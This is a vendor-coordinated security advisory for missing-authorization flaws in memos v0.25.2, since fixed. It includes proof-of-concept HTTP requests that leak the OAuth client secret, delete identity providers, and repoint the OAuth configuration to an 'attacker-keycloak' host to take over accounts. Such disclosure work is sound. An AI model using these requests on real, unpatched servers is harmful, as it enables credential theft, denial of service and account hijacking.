usd-2025-57 | Broken Access Control in IDP Server
Product: memos
Affected Version: v0.25.2
Vulnerability Type: CWE-862: Missing Authorization
Security Risk: High
Vendor: usememos
Vendor URL: https://github.com/usememos/memos
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2025-65797
CVE Link: https://www.cve.org/CVERecord?id=CVE-2025-65797
Advisory ID: usd-2025-57
Description
Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth/SSO integration, activity logging, and internationalization.
The OAuth service, managing registered identity providers, has multiple broken access control vulnerabilities. The client secret is exposed to unauthenticated users. Furthermore, authenticated users can remove registered identity providers, creating a denial of service risk. Finally, authenticated users can modify existing identity providers, enabling them to take over arbitrary accounts.
Proof of Concept
Information Leak
Unauthenticated users can request a list of registered identity providers via the following HTTP request.
GET /api/v1/identityProviders HTTP/1.1 Host: memos:5230
The response contains the client secret.
HTTP/1.1 200 OK Content-Type: application/json Grpc-Metadata-Content-Type: application/grpc Vary: Origin Content-Length: 614 { "identityProviders": [ { "name": "identityProviders/1", "type": "OAUTH2", "title": "Keycloak", "identifierFilter": "", "config": { "oauth2Config": { "clientId": "memos", "clientSecret": "uaAxplLT2BMPBV9xSJPnWUt9MBmtM8cs", "authUrl": "[http://keycloak:8000/realms/master/protocol/openid-connect/auth",]() [...], "fieldMapping": { [...] } } } } ] }
The client secret can be used to impersonate the Memos instance at the identity provider.
Denial of Service
Authenticated, low-privileged users can delete registered identity providers via the following HTTP request.
DELETE /api/v1/identityProviders/1 HTTP/1.1 Host: memos:5230 Cookie: user_session=2-c2[... Session from low-privileged user ...]a6
This prevents further sign ins and represents a denial of service attack.
Account Takeover
Authenticated, low-privileged users can modify the configuration of registered identity providers via the following HTTP request.
PATCH /api/v1/identityProviders/1?updateMask=config HTTP/1.1 Host: memos:5230 Content-Type: application/json Cookie: user_session=2-c2[... Session from low-privileged user ...]a6 Content-Length: 621 { "name": "identityProviders/1", "type": "OAUTH2", "title": "KeycloakFromAttacker", "identifierFilter": "", "config": { "oauth2Config": { "clientId": "memos", "clientSecret": "uaAxplLT2BMPBV9xSJPnWUt9MBmtM8cs", "authUrl": "[http://attacker-keycloak:8000/realms/master/protocol/openid-connect/auth",]() "tokenUrl": "[http://attacker-keycloak:8000/realms/master/protocol/openid-connect/token",]() "userInfoUrl": "[http://attacker-keycloak:8000/realms/master/protocol/openid-connect/userinfo",]() "scopes": [ "openid", "profile", "email" ], "fieldMapping": { "identifier": "preferred_username", "displayName": "username", "email": "email", "avatarUrl": "" } } } }
A malicious identity provider can then be used to take over arbitrary accounts, including the host user. Note that required usernames are accessible via the /api/v1/users/ endpoint.
Fix
Fixes for all mentioned vulnerabilities have been submitted as pull request.
References
Timeline
- 2025-11-03: First contact request
- 2025-11-04: Pull request submitted
- 2025-11-06: Commit merged to main by vendor
- 2025-11-25: Version 0.25.3 was released
- 2025-12-03: This advisory is published
Credits
This security vulnerability was identified by Florian Dewald of usd AG.